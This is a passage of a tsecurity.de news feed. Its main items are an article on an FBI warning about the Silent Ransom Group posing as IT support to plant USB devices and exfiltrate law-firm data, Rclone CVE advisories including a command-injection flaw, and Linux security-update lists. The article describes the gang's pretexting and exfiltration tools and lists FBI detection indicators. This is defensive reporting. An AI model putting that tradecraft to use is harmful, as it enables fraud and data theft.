<li><strong>Ubuntu 26.04 LTS (Gnome).</strong> Desktop-Flaggschiff und Hauptedition der neuen Ubuntu-Langzeitversion mit Gnome 50</li>



<li><strong>Q4-OS 6.6 Andromeda (Trinity).</strong> Anspruchsloses Desktopsystem auf Basis von Debian 13 für leistungsschwache Hardware</li>



<li><strong>Download-DVD mit drei Systemen.</strong> Zwei Minimalisten für ältere Hardware und ein Arch Linux mit Gnome: Antix 26, Bodhi Linux 7 &amp; Manjaro 26</li>



<li>…</li>
</ul>



<p>Die <strong>LinuxWelt 4/2026</strong> ist ab sofort am Kiosk für 8,99 Euro erhältlich. Alternativ können Sie das Heft auch über unseren Online-Shop <a href="https://shop.pcwelt.de/linuxwelt-magazin-hefte-einzel-ausgaben.htm?websale8=idg&amp;ci=8-5275" target="_blank" rel="noreferrer noopener">bestellen</a> und sich bequem nach Hause schicken lassen oder als ePaper herunterladen.</p>



<p>Die LinuxWelt gibt es auch in <a href="https://shop.pcwelt.de/linuxwelt-magazin-hefte-einzel-ausgaben.htm?websale8=idg&amp;ci=8-5275" target="_blank" rel="noreferrer noopener">digitaler Form</a> für Ihr Android-Gerät, iPad, iPhone, Windows Phone oder Windows 10.</p>



<p>Hier können Sie die <a href="https://shop.pcwelt.de/linuxwelt-magazin-abo.htm?websale8=idg&amp;ci=2-5275" target="_blank" rel="noreferrer noopener">LinuxWelt abonnieren</a>.</p>



<p><strong>Als Abonnent von</strong> PC-WELT Plus Digital erhalten Sie die <strong>LinuxWelt kostenlos.</strong> Sie erhalten per Mail einen entsprechenden Link zur digitalen Ausgabe. Mehr Informationen hierzu finden Sie in diesem Beitrag: <a href="https://www.pcwelt.de/article/1202590/pc-welt-zieht-um-digitale-ausgaben-nun-bei-emagazines.html">PC-WELT zieht um – Digitale Ausgaben nun bei eMagazines.</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Employees are unknowingly inviting tech support impersonators into firms, says FBI]]></title>
<description><![CDATA[Online or telephone IT support scams have been tricking employees into downloading or clicking on malware for years. But according to the FBI, one group that targets US-based law firms has recently found success in person, by convincing firms to allow a supposed IT support person into the buildin...]]></description>
<link>https://tsecurity.de/de/3552744/it-security-nachrichten/employees-are-unknowingly-inviting-tech-support-impersonators-into-firms-says-fbi/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552744/it-security-nachrichten/employees-are-unknowingly-inviting-tech-support-impersonators-into-firms-says-fbi/</guid>
<pubDate>Thu, 28 May 2026 03:07:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Online or telephone IT support scams have been tricking employees into downloading or clicking on malware for years. But according to the FBI, one group that targets US-based law firms has recently found success in person, by convincing firms to allow a supposed IT support person into the building, where they insert a storage device into a victim’s computer and install malware or steal data.</p>



<p>This revelation comes from <a href="https://www.ic3.gov/CSA/2026/260526.pdf" target="_blank" rel="noreferrer noopener">an FBI Flash report this week</a> describing the activities of a gang it calls The Silent Ransom Group (SRG). Other researchers call it <a href="https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/" target="_blank" rel="noreferrer noopener">Luna Moth</a>, <a href="https://www.crowdstrike.com/en-us/adversaries/chatty-spider/" target="_blank" rel="noreferrer noopener">Chatty Spider </a>and UNC3753.</p>



<p>Cybersecurity experts, though, aren’t surprised that employees can be fooled into allowing a stranger to touch their computers.</p>



<p>“The adversary visiting a location in person with a USB key hacking device of some sort has been used for decades, particularly in the banking industry,” said <a href="https://blog.knowbe4.com/author/roger-grimes" target="_blank" rel="noreferrer noopener">Roger Grimes</a>, CISO advisor at KnowBe4. </p>



<p>“Usually, it isn’t just a direct download of data, but using the USB storage drive to either monitor password typing, to install remote access software that the hacker can use to come back into the environment remotely, or to install some other sort of hacker malware. It’s so common in the banking industry that they have often added and allowed that scenario — a physical attacker — in their regular penetration testing audits, more so than any other industry.”</p>



<p><a href="https://www.sans.org/profiles/lance-spitzner" target="_blank" rel="noreferrer noopener">Lance Spitzner</a>, director of workforce cybersecurity training at the SANS Institute, said the tactic of getting into a company to use infected USB drives isn’t new, but in his opinion is relatively rare. It’s more common for a threat actor to mail a drive to an employee.</p>



<p>“Having someone physically expose themselves by going into an organization is a risk most cyber attackers are not willing to take,” he said. “The details in the FBI report are pretty limited; I’m guessing if this did happen, an attacker paid someone off to do it for them, perhaps an insider or contractor the company trusted.”</p>



<p>The FBI says SRG actors have been running data theft and extortion operations since at least 2022. Despite its name, the gang doesn’t use ransomware encryption, but typically seeks rapid access to victim systems to steal data. Then they use extortion, through threats of public disclosure or sale of stolen data, to try to get payments. </p>



<p>Historically, the gang gained access to the victim’s network by sending phishing emails purportedly charging small ‘subscription fees;’ to cancel the fake subscription, the victim was instructed to call the threat actor, who then emailed the victim a link that would download remote access software.</p>



<h2 class="wp-block-heading">New tactic</h2>



<p>But since the spring of this year, SRG actors have added a new tactic: Posing as an employee from the victim’s IT department. They either directly call or send phishing emails to urge employees to contact an SRG actor pretending to be their firm’s IT support. While on the phone, the SRG actor asks the employee to grant access to a remote desktop session. </p>



<p>If that fails, SRG sends a threat actor to the victim’s location to physically access their computer and insert a storage device. The excuse: the so-called IT support person needs to image the device, or to create a backup file to address potential impacts from the phishing email. Once the threat actor obtains access to the victim’s device, they minimally escalate privileges and quickly pivot to data exfiltration without encryption.</p>



<p>Their tools include WinSCP (Windows Secure Copy) or a hidden or renamed version of “Rclone” to exfiltrate data. They may also exfiltrate data to internal file sharing platforms such as Google Drive or Microsoft OneDrive. And once it has the firm’s data, the gang will call employees or clients of a victim company to pressure the victim to begin negotiations.</p>



<p>The FBI warns infosec pros that indicators of an SRG attack may include new, unauthorized downloads of system management or remote access tools, including Zoho Assist, Quick Assist, AnyDesk, RustDesk, Syncro, Splashtop, or Atera; unauthorized installation of external hard drives or USB drives on company computers; exfiltration of data to Microsoft OneDrive, Google Drive, or external servers; WinSCP or Rclone connection made to an external IP address; and alerts that data was exfiltrated from the company environment.</p>



<p>The primary things employees need to be trained to watch for are visits from unidentified or unauthorized individuals claiming to be IT support and attempting to access computers, and unsolicited phone calls from individuals falsely claiming to work in their IT department.</p>



<p>The FBI didn’t respond by press time to a request for information on the number of times the gang had tricked an employee into allowing a personal visit. But the tactic by SRG is new enough that the bureau is asking for a copy of the extortion note, the phone number or email account used by the group, transcripts of communications with the threat actor, and any surveillance videos or photos of individuals posing as IT support.</p>



<h2 class="wp-block-heading">The challenge of security awareness training</h2>



<p>Since the beginning of the desktop computer age, CSOs, CIOs and IT department leaders have struggled to find effective <a href="https://www.csoonline.com/article/4152631/security-awareness-is-not-a-control-rethinking-human-risk-in-enterprise-security.html" target="_blank">security awareness training</a> to fight phishing, IT tech scams, and other social engineering attacks. Law enforcement agencies<a href="https://www.csoonline.com/article/557091/feds-shut-down-tech-support-scammers-freeze-assets.html" target="_blank"> have had some success in taking gangs offline</a>, but they pop up again.</p>



<p>The threat actors may also be assisted by the fact that employees often don’t know who their IT support staff are, especially if the firm uses a third party external support company.</p>



<p><strong>[Related content</strong>: <a href="https://www.csoonline.com/article/3604803/security-awareness-training-topics-best-practices-costs-free-options.html" target="_blank">A backgrounder on security awareness training</a><strong>]</strong></p>



<p><a href="https://www.chriskayserauthor.com/">Christopher Kayser</a>, head of the Canadian firm Cybercrime Analytics and author of the book <em>Cybercrime Through Social Engineering</em>, said in an interview that often an employee’s first assumption is that an email, text, or voicemail about a serious issue from someone claiming to be from IT is legitimate.</p>



<p>After that, threat actors play on an employee’s willingness to act on a supposedly urgent matter, their obedience to management, or their wish to be helpful. “We have a tendency to trust,” he said.</p>



<p>It doesn’t help that threat actors are willing to share successful tactics with other groups, he added. Nor, he said, does it help that in some organizations, security awareness training doesn’t extend to the top (CEOs) or the bottom (receptionists).</p>



<h2 class="wp-block-heading">Trust no one</h2>



<p>To combat IT support scams, employees need to be trained that any email, text, or voicemail purporting to come from IT that asks for action needs to be verified with an IT manager through an approved process, not by replying to the message or calling a phone number given in the suspect communication, Kayser said. Employees also need to be trained to slow down, and not to respond or act quickly on emails, texts, or voicemails that ask for passwords, multifactor authentication codes, or personal information.</p>



<p>Spitzner added, “security awareness training is one approach to patching vulnerabilities in humans. You need to teach them about the risks of infected or untrusted USB drives and what drives are authorized.  In this case, the problem may have been an untrusted individual gaining access to the victim’s facilities.”</p>



<p><a href="https://www.linkedin.com/in/nicholas-tausek-6ab41611/" target="_blank" rel="noreferrer noopener">Nick Tausek</a>, lead security automation architect at Swimlane, said the Silent Ransom Group’s attack strategy of leaning into trust says a lot about where extortion is heading. “That makes this especially dangerous for law firms,” he said. “Those environments hold sensitive client records, privileged communications, financial details, and case information. If that data is stolen, the damage does not stop at the victim organization. Clients can be pressured, legal strategies can be exposed, and employees can become targets for follow-up scams.”</p>



<p>The hardest part is that much of this activity can look normal at first glance, he said. Because legitimate tools used by threat actors don’t always trigger alarms, security teams need faster ways to connect unusual behavior across users, devices, cloud storage, and remote access sessions. “When attackers are moving this quickly, delayed detection gives them the advantage,” he said.</p>



<p>Grimes added that defenses should include strong and frequent employee education about physical attacks, disabling USB ports on publicly accessible computers, and other mitigations that prevent the connection of physical storage devices. Microsoft Windows, he pointed out, has had mitigations to prevent the insertion of unauthorized storage devices, including USB sticks, for well over a decade.</p>



<p>In addition, the FBI urges physical and IT security leaders to verify the credentials of anyone accessing company spaces, obtaining copies of each visitor’s ID card, as well as limiting access to sensitive data from less secure networks, such as home computers or the public internet, and developing and communicating policies regarding when and how IT support will communicate and authenticate themselves to employees.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (postorius and spip), Fedora (bind, bind-dyndb-ldap, linux-firmware, tor, and unbound), Mageia (ffmpeg, nginx, perl-Imager, and tigervnc, x11-server, x11-server-xwayland), Oracle (firefox and kernel), Red Hat (buildah, git-lfs, go-toolset:rhel8, golang,...]]></description>
<link>https://tsecurity.de/de/3548101/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548101/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 26 May 2026 15:11:17 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (postorius and spip), <b>Fedora</b> (bind, bind-dyndb-ldap, linux-firmware, tor, and unbound), <b>Mageia</b> (ffmpeg, nginx, perl-Imager, and tigervnc, x11-server, x11-server-xwayland), <b>Oracle</b> (firefox and kernel), <b>Red Hat</b> (buildah, git-lfs, go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, gvisor-tap-vsock, java-1.8.0-openjdk, java-17-openjdk, java-21-openjdk, opentelemetry-collector, osbuild-composer, podman, rhc, rhc-worker-playbook, skopeo, and yggdrasil), <b>SUSE</b> (amazon-ecs-init, assimp, azure-storage-azcopy, busybox, firefox, gnutls, graphicsmagick, helm, kernel, leancrypto, libpng16, libppsdocument4_0-6, libsndfile, mcphost, nano, nginx, perl-http-tiny, perl-XML-LibXML, python-urllib3, python-urllib3_1, python311-ocrmypdf, python312, rclone, rsync, xen, and xz), and <b>Ubuntu</b> (dotnet8, dotnet9, dotnet10, linux-intel-iot-realtime, linux-lowlatency, linux-nvidia-6.8, linux-nvidia-tegra, linux-nvidia-tegra-igx, nltk, simpleeval, and vim).]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8299-1: Rclone vulnerabilities]]></title>
<description><![CDATA[https://ubuntu.com/security/notices/USN-8299-1 It was discovered that Rclone incorrectly handled authorization in the remote control API. An attacker could possibly use this issue to obtain sensitive information. (CVE-2026-41176) It was discovered that Rclone incorrectly handled backend instantia...]]></description>
<link>https://tsecurity.de/de/3546473/linux-tipps/usn-8299-1-rclone-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546473/linux-tipps/usn-8299-1-rclone-vulnerabilities/</guid>
<pubDate>Tue, 26 May 2026 00:21:28 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p><a href="https://ubuntu.com/security/notices/USN-8299-1">https://ubuntu.com/security/notices/USN-8299-1</a></p> <p>It was discovered that Rclone incorrectly handled authorization in the remote<br> control API. An attacker could possibly use this issue to obtain sensitive<br> information. (<a href="https://ubuntu.com/security/CVE-2026-41176">CVE-2026-41176</a>)</p> <p>It was discovered that Rclone incorrectly handled backend instantiation via the<br> remote control API. An attacker could possibly use this issue to execute<br> arbitrary code. This issue only affected Ubuntu 24.04 LTS, Ubuntu 25.10 and<br> Ubuntu 26.04 LTS. (<a href="https://ubuntu.com/security/CVE-2026-41179">CVE-2026-41179</a>)</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/shk2096"> /u/shk2096 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1tndep9/usn82991_rclone_vulnerabilities/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tndep9/usn82991_rclone_vulnerabilities/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei Probleme in Rclone (Ubuntu)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3546415/it-security-nachrichten/zwei-probleme-in-rclone-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546415/it-security-nachrichten/zwei-probleme-in-rclone-ubuntu/</guid>
<pubDate>Mon, 25 May 2026 23:52:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (atril, evince, gnutls28, haproxy, haveged, jq, kernel, krb5, libgcrypt20, nodejs, and thunderbird), Fedora (aw-server-rust, awatcher, bind, bind-dyndb-ldap, chromium, composer, docker-buildkit, docker-buildx, dotnet10.0, dotnet8.0, dotnet9.0, evince, f...]]></description>
<link>https://tsecurity.de/de/3545828/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545828/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 25 May 2026 16:53:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (atril, evince, gnutls28, haproxy, haveged, jq, kernel, krb5, libgcrypt20, nodejs, and thunderbird), <b>Fedora</b> (aw-server-rust, awatcher, bind, bind-dyndb-ldap, chromium, composer, docker-buildkit, docker-buildx, dotnet10.0, dotnet8.0, dotnet9.0, evince, firefox, httpd, kernel, nodejs-aw-webui, nss, perl-Apache-Session-Browseable, pie, python-pulp-glue, python-requests, and python3.15), <b>Slackware</b> (kernel), <b>SUSE</b> (apptainer, chromium, cockpit, dnsmasq, google-guest-agent, hauler, iproute2, jfrog-cli, kernel, libecpg6, libsolv, libzypp, zypper, mcphost, oci-cli, perl-YAML-Syck, python-lxml, python-urllib3, python311-impacket, rqlite, rsync, util-linux, and xz), and <b>Ubuntu</b> (evince, linux-azure, linux-azure-5.4, linux-azure-fips, linux-azure-4.15, linux-azure-fips, linux-fips, linux-gcp-5.15, linux-lowlatency-hwe-5.15, linux-oracle-6.17, node-path-to-regexp, and rclone).]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8299-1: Rclone vulnerabilities]]></title>
<description><![CDATA[It was discovered that Rclone incorrectly handled authorization in the remote
control API. An attacker could possibly use this issue to obtain sensitive
information. (CVE-2026-41176)

It was discovered that Rclone incorrectly handled backend instantiation via the
remote control API. An attacker c...]]></description>
<link>https://tsecurity.de/de/3545256/unix-server/usn-8299-1-rclone-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545256/unix-server/usn-8299-1-rclone-vulnerabilities/</guid>
<pubDate>Mon, 25 May 2026 11:45:53 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that Rclone incorrectly handled authorization in the remote
control API. An attacker could possibly use this issue to obtain sensitive
information. (CVE-2026-41176)

It was discovered that Rclone incorrectly handled backend instantiation via the
remote control API. An attacker could possibly use this issue to execute
arbitrary code. This issue only affected Ubuntu 24.04 LTS, Ubuntu 25.10 and
Ubuntu 26.04 LTS. (CVE-2026-41179)]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (libpng and nginx), Debian (erlang, netatalk, and nginx), Fedora (mod_md and SDL2_image), Mageia (perl-libwww-perl, perl-HTTP-Message, perl-WWW-Mechanize-Cached, perl-File-XDG, perl-Path-Tiny, perl-YAML-Syck, postgresql15, and rclone), SUSE (agama, a...]]></description>
<link>https://tsecurity.de/de/3529281/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3529281/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 19 May 2026 15:27:56 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (libpng and nginx), <b>Debian</b> (erlang, netatalk, and nginx), <b>Fedora</b> (mod_md and SDL2_image), <b>Mageia</b> (perl-libwww-perl, perl-HTTP-Message, perl-WWW-Mechanize-Cached, perl-File-XDG, perl-Path-Tiny, perl-YAML-Syck, postgresql15, and rclone), <b>SUSE</b> (agama, alloy, cacti, cloud-init, dnsmasq, emacs, firefox, glibc, go1.25, go1.26, google-cloud-sap-agent, google-guest-agent, ibus-rime, librime, imagemagick, kernel, libsndfile, nginx, ongres-scram, ongres-stringprep, plexus-testing,, openexr, openssh, PackageKit, perl-Text-CSV_XS, php-composer2, php8, postgresql16, postgresql18, python-lxml, python-python-multipart, python3, python311-urllib3, rmt-server, rsync, tiff, tree-sitter, util-linux, and xen), and <b>Ubuntu</b> (linux, linux-aws, linux-aws-5.4, linux-aws-fips, linux-azure, linux-azure-5.4, linux-azure-fips, linux-bluefield, linux-fips, linux-gcp, linux-gcp-5.4, linux-gcp-fips, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm, linux-oracle, linux-oracle-5.4, linux-xilinx-zynqmp, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-raspi, and linux-xilinx-zynqmp).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by Debian (ffmpeg, gsasl, nodejs, postgresql-15, postgresql-17, python3.9, and thunderbird), Fedora (expat, firefox, freerdp, GitPython, kernel, php, rust-podman-sequoia, rust-rpm-sequoia, rust-sequoia-chameleon-gnupg, rust-sequoia-git, rust-sequoia-keystore-serv...]]></description>
<link>https://tsecurity.de/de/3519855/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3519855/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 15 May 2026 15:23:14 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (ffmpeg, gsasl, nodejs, postgresql-15, postgresql-17, python3.9, and thunderbird), <b>Fedora</b> (expat, firefox, freerdp, GitPython, kernel, php, rust-podman-sequoia, rust-rpm-sequoia, rust-sequoia-chameleon-gnupg, rust-sequoia-git, rust-sequoia-keystore-server, rust-sequoia-octopus-librnp, rust-sequoia-openpgp, rust-sequoia-sop, rust-sequoia-sq, and rust-sequoia-sqv), <b>Mageia</b> (awstats, libreoffice, perl-HTTP-Tiny, and tomcat), <b>Oracle</b> (corosync, freerdp, gimp, git-lfs, glib2, jq, kernel, krb5, libsoup3, libtiff, openexr, thunderbird, uek-kernel, and yggdrasil), <b>Red Hat</b> (podman and skopeo), <b>SUSE</b> (amazon-ssm-agent, avahi, c-ares, cairo, containerd, cpp-httplib, dnsmasq, dovecot24, ffmpeg-4, firefox, helm, ImageMagick, iproute2, kernel, krb5, libtpms, ongres-scram, ongres-stringprep, plexus-testing, maven, maven-doxia, mojo-parent, sisu, openCryptoki, openssh, perl-Text-CSV_XS, php8, python-lxml, python-Twisted-doc, python311-click, python311-GitPython, rclone, regclient, and syncthing), and <b>Ubuntu</b> (avahi).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-41176 | Rclone up to 1.73.4 RC Endpoint options/set missing authentication (GHSA-25qr-6mpr-f7qx / Nessus ID 314577)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Rclone up to 1.73.4. Affected is an unknown function of the file options/set of the component RC Endpoint. This manipulation causes missing authentication.

This vulnerability appears as CVE-2026-41176. The attack may be initiated remotely. ...]]></description>
<link>https://tsecurity.de/de/3517876/sicherheitsluecken/cve-2026-41176-rclone-up-to-1734-rc-endpoint-optionsset-missing-authentication-ghsa-25qr-6mpr-f7qx-nessus-id-314577/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517876/sicherheitsluecken/cve-2026-41176-rclone-up-to-1734-rc-endpoint-optionsset-missing-authentication-ghsa-25qr-6mpr-f7qx-nessus-id-314577/</guid>
<pubDate>Thu, 14 May 2026 22:53:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/rclone">Rclone up to 1.73.4</a>. Affected is an unknown function of the file <em>options/set</em> of the component <em>RC Endpoint</em>. This manipulation causes missing authentication.

This vulnerability appears as <a href="https://vuldb.com/cve/CVE-2026-41176">CVE-2026-41176</a>. The attack may be initiated remotely. There is no available exploit.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-41179 | Rclone up to 1.73.4 RC Endpoint operations/fsinfo bearer_token_command os command injection (GHSA-jfwf-28xr-xw6q / Nessus ID 314577)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in Rclone up to 1.73.4. This affects the function bearer_token_command of the file operations/fsinfo of the component RC Endpoint. The manipulation leads to os command injection.

This vulnerability is documented as CVE-2026-41179. The atta...]]></description>
<link>https://tsecurity.de/de/3517863/sicherheitsluecken/cve-2026-41179-rclone-up-to-1734-rc-endpoint-operationsfsinfo-bearertokencommand-os-command-injection-ghsa-jfwf-28xr-xw6q-nessus-id-314577/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3517863/sicherheitsluecken/cve-2026-41179-rclone-up-to-1734-rc-endpoint-operationsfsinfo-bearertokencommand-os-command-injection-ghsa-jfwf-28xr-xw6q-nessus-id-314577/</guid>
<pubDate>Thu, 14 May 2026 22:53:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/rclone">Rclone up to 1.73.4</a>. This affects the function <code>bearer_token_command</code> of the file <em>operations/fsinfo</em> of the component <em>RC Endpoint</em>. The manipulation leads to os command injection.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-41179">CVE-2026-41179</a>. The attack can be initiated remotely. There is not any exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[What's your favorite non-essential CLI tool/command?]]></title>
<description><![CDATA[I love using CLI tools like yazi (file mgr), rclone (cloud storage rsync), translate-shell (translator), lsd (better ls), nusgmon (data usage, i made that though), taskwarrior etc. it feels so nice and cool how awesome is CLI that can show almost anything just in texts. what's your favorite linux...]]></description>
<link>https://tsecurity.de/de/3515226/linux-tipps/whats-your-favorite-non-essential-cli-toolcommand/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3515226/linux-tipps/whats-your-favorite-non-essential-cli-toolcommand/</guid>
<pubDate>Thu, 14 May 2026 00:36:46 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I love using CLI tools like <code>yazi</code> (file mgr), <code>rclone</code> (cloud storage rsync), <code>translate-shell</code> (translator), <code>lsd</code> (better ls), <code>nusgmon</code> (data usage, i made that though), <code>taskwarrior</code> etc. it feels so nice and cool how awesome is CLI that can show almost anything just in texts. what's your favorite linux tools, wanna share?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Anonyboy26"> /u/Anonyboy26 </a> <br> <span><a href="https://i.redd.it/axixxgrybu0h1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tbqe7l/whats_your_favorite_nonessential_cli_toolcommand/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (corosync, freeipmi, kernel, and kernel-rt), Debian (corosync, firefox-esr, kernel, lcms2, libpng1.6, linux-6.1, php8.2, php8.4, postorius, pyjwt, and tor), Fedora (dotnet10.0, exim, gnutls, kernel, nextcloud, nodejs22, php, proftpd, prosody, python-...]]></description>
<link>https://tsecurity.de/de/3507119/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3507119/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 11 May 2026 15:14:36 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (corosync, freeipmi, kernel, and kernel-rt), <b>Debian</b> (corosync, firefox-esr, kernel, lcms2, libpng1.6, linux-6.1, php8.2, php8.4, postorius, pyjwt, and tor), <b>Fedora</b> (dotnet10.0, exim, gnutls, kernel, nextcloud, nodejs22, php, proftpd, prosody, python-pulp-glue, python-requests, rclone, and SDL3_image), <b>Mageia</b> (firefox, nss, rootcerts, openvpn, thunderbird, and vim), <b>Oracle</b> (corosync, freeipmi, gstreamer1-plugins-bad-free, gstreamer1-plugins-base, and gstreamer1-plugins-good, kernel, libpng, and mingw-libtiff), <b>Slackware</b> (kernel and mozilla), <b>SUSE</b> (build, product-composer, c-ares, cairo, copacetic, distribution, firefox, firefox-esr, frr, glibc, go1.25, google-cloud-sap-agent, iproute2, java-11-openj9, java-17-openj9, java-17-openjdk, java-1_8_0-openj9, java-21-openj9, java-21-openjdk, java-25-openjdk, kernel, libexif-devel, libpcp-devel, libtpms, libtree-sitter0_26, Mesa, micropython, mozjs128, nginx, opencc, openCryptoki, php-composer2, podman, postfix, python-pytest, python311-Django, python311-Django4, redis, semaphore, strongswan, terraform-provider-aws, terraform-provider-azurerm, terraform-provider-external, terraform-provider-google, terraform-provider-helm, terraform-provider-kubernetes, terraform-provid, tor, valkey, vim, and wireshark), and <b>Ubuntu</b> (linux-nvidia-tegra, linux-raspi, linux-raspi-5.4, and nasm).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rclone (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3505842/unix-server/security-mehrere-probleme-in-rclone-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3505842/unix-server/security-mehrere-probleme-in-rclone-fedora/</guid>
<pubDate>Mon, 11 May 2026 07:31:00 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in rclone (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3505356/it-security-nachrichten/mehrere-probleme-in-rclone-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3505356/it-security-nachrichten/mehrere-probleme-in-rclone-fedora/</guid>
<pubDate>Sun, 10 May 2026 23:37:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape]]></title>
<description><![CDATA[Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark

Introduction 
Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive thr...]]></description>
<link>https://tsecurity.de/de/3501417/it-security-nachrichten/ransomware-under-pressure-tactics-techniques-and-procedures-in-a-shifting-threat-landscape/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501417/it-security-nachrichten/ransomware-under-pressure-tactics-techniques-and-procedures-in-a-shifting-threat-landscape/</guid>
<pubDate>Fri, 08 May 2026 23:19:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span><strong> </strong></h3>
